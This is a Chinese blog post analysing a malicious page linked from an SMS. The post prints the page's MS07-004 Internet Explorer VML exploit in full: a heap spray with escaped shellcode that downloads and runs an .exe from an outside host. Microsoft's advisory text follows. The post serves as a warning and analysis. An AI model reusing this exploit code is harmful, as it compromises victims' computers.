MS07-004 的攻擊例

今天早上起床收到一則簡訊,發信人是我媽,內容如下圖。
我媽是個邁向 60 歲的奶奶級人物,發訊的時間絕對不可能用電腦,此外我媽也不會注音文跟火星文,所以立即就可以判定這則簡訊不可能是我媽發的,我媽大部分用 Live Messenger 啟動音訊對談,所以我綜合推想,應該是我媽的帳號密碼被盜用了,不會是從我媽的電腦外傳出來。 
 
既然知道是問題簡訊了,當然不會蠢到立刻點下去中獎上當,所以先用 telnet 去連該網址,看起來似乎有認瀏覽器才回應,直接透過 TCP 下 GET / HTTP/1.0 不理我,再加上 IE7 的標籤測試,傳回:
< script src=’xx-http://s53.cnzz.com/stat.php?id=469103&web_id=469103&#8242; language=’JavaScript’ charset=’gb2312′>< /script>
 
這個 script 是名為 ad.js ,經過編碼後動態寫入網頁,所以網頁內容為:

< html xmlns:v="urn:schemas-microsoft-com:vml">
< head>
< object id="VMLRender" classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">
< /object>
< style>
v:*{behavior:url(#VMLRender);}
< /style>
< script>
sh=unescape("%u9090"+"%u9090"+
"%u9090%u6090%u17eb%u645e%u30a1%u0000%u0500%u0800%u0000%uf88b%u00b9"+
"%u0004%uf300%uffa4%ue8e0%uffe4%uffff%ua164%u0030%u0000%u408b%u8b0c"+
"%u1c70%u8bad%u0870%uec81%u0200%u0000%uec8b%ue8bb%u020f%u8b00%u8503"+
"%u0fc0%ubb85%u0000%uff00%ue903%u0221%u0000%u895b%u205d%u6856%ufe98"+
"%u0e8a%ub1e8%u0000%u8900%u0c45%u6856%u4e8e%uec0e%ua3e8%u0000%u8900"+
"%u0445%u6856%u79c1%ub8e5%u95e8%u0000%u8900%u1c45%u6856%uc61b%u7946"+
"%u87e8%u0000%u8900%u1045%u6856%ufcaa%u7c0d%u79e8%u0000%u8900%u0845"+
"%u6856%u84e7%ub469%u6be8%u0000%u8900%u1445%ue0bb%u020f%u8900%u3303"+
"%uc7f6%u2845%u5255%u4d4c%u45c7%u4f2c%u004e%u8d00%u285d%uff53%u0455"+
"%u6850%u1a36%u702f%u3fe8%u0000%u8900%u2445%u7f6a%u5d8d%u5328%u55ff"+
"%uc71c%u0544%u5c28%u652e%uc778%u0544%u652c%u0000%u5600%u8d56%u287d"+
"%uff57%u2075%uff56%u2455%u5756%u55ff%ue80c%u0062%u0000%uc481%u0200"+
"%u0000%u3361%uc2c0%u0004%u8b55%u51ec%u8b53%u087d%u5d8b%u560c%u738b"+
"%u8b3c%u1e74%u0378%u56f3%u768b%u0320%u33f3%u49c9%uad41%uc303%u3356"+
"%u0ff6%u10be%uf23a%u0874%ucec1%u030d%u40f2%uf1eb%ufe3b%u755e%u5ae5"+
"%ueb8b%u5a8b%u0324%u66dd%u0c8b%u8b4b%u1c5a%udd03%u048b%u038b%u5ec5"+
"%u595b%uc25d%u0008%u92e9%u0000%u5e00%u80bf%u020c%ub900%u0100%u0000"+
"%ua4f3%uec81%u0100%u0000%ufc8b%uc783%uc710%u6e07%u6474%uc76c%u0447"+
"%u006c%u0000%uff57%u0455%u4589%uc724%u5207%u6c74%uc741%u0447%u6c6c"+
"%u636f%u47c7%u6108%u6574%uc748%u0c47%u6165%u0070%u5057%u55ff%u8b08"+
"%ub8f0%u0fe4%u0002%u3089%u07c7%u736d%u6376%u47c7%u7204%u0074%u5700"+
"%u55ff%u8b04%u3c48%u8c8b%u8008%u0000%u3900%u0834%u0474%uf9e2%u12eb"+
"%u348d%u5508%u406a%u046a%uff56%u1055%u06c7%u0c80%u0002%uc481%u0100"+
"%u0000%ue8c3%uff69%uffff%u048b%u5324%u5251%u5756%uecb9%u020f%u8b00"+
"%u8519%u75db%u3350%u33c9%u83db%u06e8%ub70f%u8118%ufffb%u0015%u7500"+
"%u833e%u06e8%ub70f%u8118%ufffb%u0035%u7500%u8330%u02e8%ub70f%u8318"+
"%u6afb%u2575%uc083%u8b04%ub830%u0fe0%u0002%u0068%u0000%u6801%u1000"+
"%u0000%u006a%u10ff%u0689%u4489%u1824%uecb9%u020f%uff00%u5f01%u5a5e"+
"%u5b59%ue4b8%u020f%uff00%ue820%ufdda%uffff"+
"%u7468%u7074%u2F3A%u772F%u7777%u632E"+
"%u756C%u3862%u742E%u2F77%u6577%u2F62%u706A%u2E67%u7865%u0065");
sz=sh.length*2;
npsz=0x1000000-(sz+0x38);
nps=unescape("%u0c0c%u0c0c");
while(nps.length*2<npsz)nps+=nps;
ihbc=(0x09000000-0x1000000)/0x1000000;
mm=new Array();
for(i=0;i<ihbc;i++)
{
mm[i]=nps+sh;
}
< /script>
< /head>
< BODY onload=window.status="">
< v:rect style="width:0pt;height:0pt" fillcolor="white" >
< v:recolorinfo recolorstate="t" numcolors="97612895">
< v:recolorinfoentry  forecolor="rgb(1,0,66)"  tocolor="rgb(1,0,66)"
recolortype="3084" lbcolor="rgb(1,0,66)" backcolor="rgb(1,0,66)"
fromcolor="rgb(1,0,66)" lbstyle ="3084" bitmaptype="3084" />
< v:recolorinfoentry  forecolor="rgb(1,0,66)"  tocolor="rgb(1,0,66)"
recolortype="3084" lbcolor="rgb(1,0,66)" backcolor="rgb(1,0,66)"
fromcolor="rgb(1,0,66)" lbstyle ="3084" bitmaptype="3084" />
< v:recolorinfoentry  forecolor="rgb(1,0,66)"  tocolor="rgb(1,0,66)"
recolortype="3084" lbcolor="rgb(1,0,66)" backcolor="rgb(1,0,66)"
fromcolor="rgb(1,0,66)" lbstyle ="3084" bitmaptype="3084" />
< v/recolorinfo>
< /body>
< /html>


透過一個 cur (滑鼠游標檔) 來產生危害。
 
相關安全說明網址如下
產生的危害
Microsoft Windows 的向量標記語言 (VML) 實作中存在遠端執行程式碼的弱點。 攻擊者可蓄意製作網頁或 HTML 電子郵件來利用這個弱點,在使用者造訪此網頁或檢視此訊息時遠端執行程式碼。 成功利用此弱點的攻擊者可以取得受影響系統的完整控制權。
可能發生的原因
在網頁式攻擊的案例中,攻擊者可架設一個網站,並在其中包含利用此弱點的網頁。 此外,受侵害的網站以及接受或存放使用者提供之內容或廣告的網站裡,也可能包含蓄意製作以利用本弱點的內容。 但是,攻擊者無法強迫使用者造訪網站, 而是引誘使用者自行前往。一般的做法是設法讓使用者按一下電子郵件或 Instant Messenger 訊息中通往攻擊者網站的連結。

說實在的,我自己滿喜歡 VML 的,就是有人要拿來誤用,很討厭說。
廣告
Categories: 電腦和網際網路 | 1 則迴響

文章分頁導航

One thought on “MS07-004 的攻擊例

  1. 子璉

    我刻意加上紅字,並在標籤加入空白,避免被各種瀏覽器不小心誤解回 html 了,所以看到紅字、空白是我加上去的,不是原始就是這樣,原始就是這樣的話,那還能感染就真的很天才。

    按讚數

發表迴響

在下方填入你的資料或按右方圖示以社群網站登入:

WordPress.com Logo

您的留言將使用 WordPress.com 帳號。 登出 / 變更 )

Twitter picture

您的留言將使用 Twitter 帳號。 登出 / 變更 )

Facebook照片

您的留言將使用 Facebook 帳號。 登出 / 變更 )

Google+ photo

您的留言將使用 Google+ 帳號。 登出 / 變更 )

連結到 %s

在WordPress.com寫網誌.

%d 位部落客按了讚: